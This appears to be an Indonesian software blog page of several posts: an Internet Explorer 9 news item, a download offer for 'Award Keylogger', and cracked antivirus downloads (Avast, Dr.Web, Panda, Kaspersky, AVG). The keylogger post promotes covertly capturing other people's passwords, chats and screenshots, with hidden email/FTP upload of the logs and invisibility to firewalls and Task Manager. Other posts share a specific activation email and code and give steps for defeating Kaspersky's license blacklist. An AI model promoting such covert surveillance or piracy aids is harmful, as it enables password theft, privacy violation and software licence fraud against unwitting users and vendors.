Internet Explorer 9 nantinya hanya akan dapat digunakan untuk pengguna Windows Vista dan Windows 7. Microsoft mengatakan, adanya keterbatasan performance dan keamanan system operasi Windows XP yang menyebabkan system operasi tersebut tidak bisa menangani browser versi baru itu.


Microsoft telah menyediakan IE9 Platform Preview untuk mencoba fitur dan kemampuan baru pada pengembang dan pengguna yang ingin mencobanya. IE9 Platform Review tidak dapat digunakan untuk melakukan browsing. IE9 Platform Review sama sekali bukan berarti versi Beta, tujuan microsoft adalah untuk mendapatkan masukkan tentang Internet Explorer 9 sebelum dikeluarkan nantinya agar IE9 hadir tampil dengan sempurna


Photobucket


Sumber:d60pc

Award Keylogger v1.8 2010

Satu lagi software yang bisa anda gunakan untuk iseng,tapi ingat "untuk iseng"bukan untuk jahat...Dengan software ini anda bisa mendapat kan password setia orang yang menggunakan komputer anda.

berikut penjelasan singkatnya...
Penghargaan Keylogger cepat, terlihat dan mudah digunakan alat pengawasan yang memungkinkan Anda untuk mencari tahu apa yang dilakukan pengguna lain di komputer Anda dalam ketidakhadiran Anda.

Ini catatan setiap keystroke ke sebuah file log. File log yang dapat dikirim secara diam-diam dengan email atau FTP untuk penerima tertentu. Penghargaan Keylogger juga dapat mendeteksi kata kunci tertentu dan mengambil screenshot setiap kali ada yang diketik, menampilkan temuan dalam penampil log rapi. Ini menyebabkan tidak mencurigakan slowdowns dan membutuhkan sangat sedikit sumber daya sistem. semua ini terjadi dalam modus diam-diam penuh sehingga orang yang anda monitor tidak akan menyadarinya.

Fitur Utama:

  • Mudah digunakan, bahkan untuk pemula
  • Sama sekali tidak terlihat / stealth mode
  • Log *** s dan password yang diketik dalam setiap aplikasi
  • Mengetik pesan log dalam semua instant messenger
  • Visual surveilans, dukungan tampilan screenshot
  • Slide show untuk screenshot
  • Menangkap isi di balik tanda bintang
  • Captures klik mouse
  • Mengunjungi situs web log
  • Captures AOL / AIM / Yahoo / ICQ chatting
  • Kata Kunci Deteksi dan Pemberitahuan
  • Catatan isi dilindungi password halaman web, termasuk Web Mail pesan
  • Log Windows Clipboard
  • Mengirim log melalui e-mail
  • Upload SEMUA log ke folder terpisah melalui FTP
  • Invisible untuk program firewall
  • Terlihat dalam daftar startup Windows
  • Memonitor semua pengguna PC
  • User friendly HTML format file untuk log diemail
  • NT/2000/XP/VISTA/7 tak terlihat di Windows Task Manager dan Windows 9.x/Me Task List
  • Records Windows 9.x/Me/2000/XP/VISTA/7 logon password
  • Memotong kotak DOS dan Jawa-chat keystrokes
  • Mendukung keyboard internasional
  • Log penampil eksternal
  • Mendukung pencetakan dari log
  • Dioptimalkan untuk Windows XP
  • Ekspor Log ke HTML

berminat mencoba??silahkan

Photobucket


Tukeran Link

Bagi sobat yang pengen tukeran Link dengan saya silahkancopy script dibaeah ini :


Nah banner nya silahkan copy lagi script dibawah ini:

Download Free Software




HAPPY BLOGING..........

REGARDS...!!!!

Avast pro 5.0.418+Crack


avast! Free Antivirus adalah sempurna untuk orang-orang yang mengirim e-mail dan surfing situs web populer. avast! adalah paket aplikasi yang bertujuan untuk melindungi komputer Anda dari kemungkinan infeksi virus atau ancaman malware lainnya. Jika Anda menggunakannya dengan benar, dan dalam kombinasi dengan program lain seperti utilitas backup data, akan secara signifikan mengurangi resiko komputer Anda diserang atau terinfeksi oleh virus, dan dengan demikian risiko kehilangan data yang penting atau swasta.

File help ini telah diciptakan untuk membantu Anda memahami bagaimana program itu bekerja secara keseluruhan, dan juga menggambarkan sifat dan fungsi dari komponen-komponen. Kami mengasumsikan pengguna memiliki pengetahuan tentang istilah dasar dan keterampilan dasar yang diperlukan untuk menggunakan sistem operasi Windows. Jika Anda tidak akrab dengan istilah-istilah seperti "folder", "file", atau "jendela", atau apa artinya untuk "mengaktifkan jendela" atau "klik tombol", kami menyarankan Anda berkonsultasi pemakai yang tepat manual sebelum melanjutkan .

Berdasarkan memenangkan penghargaan avast! mesin antivirus, avast! 5,0 antivirus berisi semua fitur yang Anda harapkan dalam program antivirus modern. Ini menggabungkan teknologi anti-spyware disertifikasi oleh West Coast Labs proses Checkmark, juga sebagai anti-rootkit dan kuat kemampuan proteksi diri, tapi sekarang menyediakan lebih cepat melakukan penelusuran dengan meningkatkan kemampuan deteksi. Berisi beberapa real-time "Shields" yang terus memantau email dan koneksi internet dan memeriksa file pada komputer Anda setiap kali mereka dibuka atau ditutup.

avast! 5,0 antivirus sekarang juga dilengkapi dengan sebuah antarmuka pengguna dirombak untuk lebih mudah pemindaian. avast! Antivirus pro 5,0 menawarkan sejumlah fitur tambahan, termasuk script perisai dan proses virtualisasi modul, sementara avast! Internet Security 5,0 dilengkapi dengan antispam filter dan built-in firewall. Setelah terinstal, avast! berjalan tanpa suara di latar belakang untuk melindungi komputer Anda terhadap semua bentuk malware yang dikenal. Anda tidak perlu melakukan apa-apa lagi - hanya menginstal dan lupa!
Download:

Photobucket

OR

Photobucket


Naevius USB Antivirus 2.1


USB drive sangat populer dan umumnya bisa digunakan untuk memindahkan data antara sistem beberapa sering. USB drive walaupun sangat berguna, potensi mereka berkembang biak bagi virus. Bila Anda tetap flash drive Anda komputer host akan mencari perintah dalam \ "autorun.inf \" akan dieksekusi secara otomatis. Biasanya perintah-perintah tersebut di \ "autorun.inf \" tidak berbahaya, tetapi jika file tersebut diubah, hal itu mungkin panggilan untuk pelaksanaan Trojan atau program apa pun di flash drive USB anda secara otomatis.
Naevius USB Antivirus adalah sebuah alat yang melindungi pena Anda berkendara dari autorun-virus.

Fitur utama dari USB Naevius Antivirus.


  • Perlindungan terhadap Trojans, spyware, worm melalui USB storage.
  • Kompatibel dengan apapun antivirus penduduk seperti misalnya: BitDefender, NOD32, Kaspersky, AVG, Norton, McAfee, Panda, AVAST dll
  • Perlindungan secara realtime.
  • 100% perlindungan dari luar yang dilindungi USB drive sangat populer dan umumnya bisa digunakan untuk memindahkan data antara sistem beberapa sering. USB drive walaupun sangat berguna, potensi mereka berkembang biak bagi virus. Bila Anda tetap flash drive Anda komputer host akan mencari perintah dalam \ "autorun.inf \" akan dieksekusi secara otomatis. Biasanya perintah-perintah tersebut di \ "autorun.inf \" tidak berbahaya, tetapi jika file tersebut diubah, hal itu mungkin panggilan untuk pelaksanaan Trojan atau program apa pun di flash drive USB anda secara otomatis.
  • Naevius USB Antivirus adalah sebuah alat yang melindungi pena Anda berkendara dari autorun-virus.

Fitur utama dari USB Naevius Antivirus.


  1. Perlindungan terhadap Trojans, spyware, worm melalui USB storage.
  2. Kompatibel dengan apapun antivirus penduduk seperti misalnya: BitDefender, NOD32, Kaspersky, AVG, Norton, McAfee, Panda, AVAST dll
  3. Perlindungan secara realtime dengan.
  4. 100% perlindungan dari luar yang dilindungi dengan write - protected "autorun.inf \" file.


Photobucket


Anti Virus Dr.Web 6.00.0.03150 (x32/x64)

Dr.Web ® for Windows menyediakan handal dan sangat efisien perlindungan sistem dan data anda tanpa apa jenis MICR * lunak sistem operasi diinstal pada komputer Anda. The Dr.Web ® for Windows komponen memungkinkan dalam modus real time untuk mendeteksi program berbahaya dari sumber eksternal.

Dibuat pada awal tahun 90-an di Rusia oleh Igor Daniloff, Dr.Web ® selalu mencerminkan pengarangnya filosofi dasar: keamanan berarti tidak ada kompromi. Banyak inovasi yang ditandai oleh Dr.Web telah lama menjadi standar industri AV, misalnya, cross-platform struktur. Setelah muncul sebagai respon atas perkembangan ancaman virus polimorfik, Dr.Web Anti-virus masih tetap di depan, selalu menunjukkan 100% hasil dalam Virus Bulletin review perbandingan untuk jenis virus yang paling rumit.

Fitur lain yang selalu membedakan ® Dr.Web anti-virus dari para pesaingnya adalah memori rendah / penggunaan sumber daya, sehingga tetap unnoticeable AV ini ke user. Tapak rendah ini BERSAMA dengan kemampuan deteksi yang tinggi telah menarik jutaan pengguna di seluruh dunia untuk Dr.Web.
mau coba??

Photobucket

Kode:

Photobucket

Panda Antivirus

Dengan penggunaan Resource Memory yang minimal membuat Antivirus ini begitu ringan di komputer pemakainya, Belum lagi Proteksi Panda yang menggunakan Teknologi TruPrevent dan Collective Intelligence membuatnya lebih unggul dari Antivirus lainnya. Compatible with windows 7

Instal Antivirus ini dan lupakan tentang virus, Penggunaanya yang mudah membuat pengguna Antivirus Pro , tidak mengalami kesulitan saat meng-install dan menggunakannya. Selain Ringan Untuk komputer, juga terdapat Firewall didalamnya dan USB Vacine

ikuti langkah berikut:

  • setelah di download, lalu di install
  • setelah itu masukin aja
  • EMAIL : megabazaar2010@yahoo.com
  • client number :655307268
  • Activation Code: 5GRDE2E-73927530 location indonesia
silahkan download

Photobucket


Kaspersky AntiVirus/InternetSecurity+Unblacklist+All Keys

Sesuai dengan tahunnya,sekarang sudah keluar kaspersky2010 soalnya menurutku kaspersky adalah masih yang terbaik dalam hal Internet Security. Kaspersky Internet Security 2010 ini sangat ampuh menangkal berbagai virus, spam, malware, hacker, phising dan lain-lainnya.

yang baru adalah sebagi berikut:


  • Improved! Complete PC Protection – Green means your computer is up to date and completely safe and secure from malicious threats.
  • Improved! Kaspersky Urgent Detection System - Offers the ultimate real-time protection when you surf the web, use web mail, or download files.
  • Kaspersky Security Analyzer - Scans all applications to ensure you're running the latest and safest software.
  • New! Kaspersky Safe Run - Let's you run your applications and browsers in an isolated location on your PC, preventing access to your private data or computer resources.

Cara agar Kaspersky nggak kena Blacklist:


  1. buka Kasperky, trus buka settings, pilih options.
  2. di options ada tulisan "Enabled self-defense" lalu hilangkan centang-nya
  3. Kasperky di pause protection trus di exit
  4. Masuk ke (untuk windows vista & 7) ===> C:\ProgramData\Kaspersky Lab\AVP9\Bases\
  5. Masuk ke (untuk windows xp) ===> C:\Documents and Settings\All Users\Application Data\Kaspersky Lab\AVP9\Bases\copy & replace ISI FOLDER "Kaspersky_NO_BL" ke dalam folder diatas.
  6. Aktifkan lagi antivirusnya...
  7. masuk ke options, "Enabled self-defense" di beri centang lagi.

catatan:
setelah di copy "Kaspersky_NO_BL", akan ada pesan: "The black list is damaged." atau "The black list is corrupt." ,
tunggu aja sekitar 5-10 menit ntar jg normal lagi. Setelah normal, update antivirusnya...
catatan :
- mulai dari proses install + Unblacklist + Masukin Keys = Disabled Conennection (Ga boleh connect Internet)
- Kalo udah semua beres tinggal UPDATE connect Internet

Download Kaspersky Internet Security 2010 Final Version kis9.0.0.736en

Photobucket

Download Kaspersky Antivirus 2010 Final Version kav9.0.0.736en

Photobucket

Kaspersky 2010 Blacklist crack WAJIB DOWNLOAD biar ga di blacklist

Photobucket

Kaspersky 2010 Blacklist crack WAJIB DOWNLOAD biar ga di blacklist mirror

Photobucket

AVG Internet Security v9.0.663 Build 1703

Dengan AVG Internet Security, perlindungan paling canggih, Anda mendapatkan khawatir-pengalaman online gratis setiap saat. Keamanan internet berlapis-lapis perlindungan berarti Anda tidak perlu khawatir tentang pencurian identitas, spam atau virus. Dan bahkan akan mencegah Anda dari sengaja mengunjungi situs berbahaya.

Itu lebih cepat, lebih pintar keamanan yang tidak akan memperlambat komputer Anda ke bawah.

  • Aman bank dan berbelanja online tanpa takut pencurian identitas berkat AVG Perlindungan Identity baru teknologi
  • Surf, dan pencarian dengan percaya diri, dengan LinkScanner ® memeriksa halaman web pada satu-satunya waktu yang penting - sebelum anda klik link
  • Exchange foto dan file lain dengan teman-teman melalui IM dan jaringan sosial yang aman dari risiko terjadinya infeksi virusAman download musik dan aplikasi
  • Simpanlah kotak masuk Anda bersih dari phisher, scammers, dan spammer sehingga Anda dapat fokus pada menggunakan email Anda untuk tetap berhubungan dengan teman dan keluarga
  • Nikmati kecepatan tinggi secara konsisten kinerja pemindaian dengan virus scanner ditingkatkan BARU

SIlahkan:

Photobucket

keyNya:

Photobucket